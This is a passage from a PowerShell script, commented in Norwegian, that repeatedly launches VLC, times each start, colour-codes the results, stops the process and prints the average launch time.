| [int] $teller = "1" 18 | [int] $SammenLagtTid = "0" 19 | 20 | Write-Host "" 21 | 22 | while ( $teller -lt 1001) { #Velger 101 stk for å få 100 i tabellen. 23 | 24 | #Husk å endre under: 25 | [int]$tid = "0" 26 | 27 | $tid = Measure-Command { .\vlc.exe } | Select -ExpandProperty Milliseconds 28 | #$tid = Measure-Command { .\wmplayer.exe } | Select -ExpandProperty Milliseconds 29 | 30 | If ($tid -eq "22" -or $tid -lt "22") { 31 | Write-Host "Kjøring nr. $teller viser $tid" -Fore Green 32 | } 33 | If ($tid -eq "23" -or 34 | $tid -gt 23 -and 35 | $tid -lt "28") { 36 | Write-Host " Kjøring nr. $teller viser $tid <-" -Fore Yellow 37 | } 38 | If ($tid -eq "28" -or $tid -gt "28") { 39 | Write-Host " Kjøring nr. $teller viser $tid <-" -Fore Red 40 | } 41 | 42 | #Legger sammen all tiden. 43 | 44 | $SammenLagtTid = $SammenLagtTid + $tid 45 | 46 | $teller++ 47 | 48 | $FinnesProgram = Get-Process -Name $ProgramNavn 49 | If ($FinnesProgram -eq $null) { 50 | Write-Host "`nProgrammet kjører ikke" -Fore Yellow 51 | } Else { 52 | Get-Process | 53 | Where-Object {$_.ProcessName -match $ProgramNavn} | 54 | Stop-Process -Force 55 | } 56 | } 57 | 58 | Write-Host "`nGjennomsnittet er $($SammenLagtTid/$teller) millisekunder" 59 | --------------------------------------------------------------------------------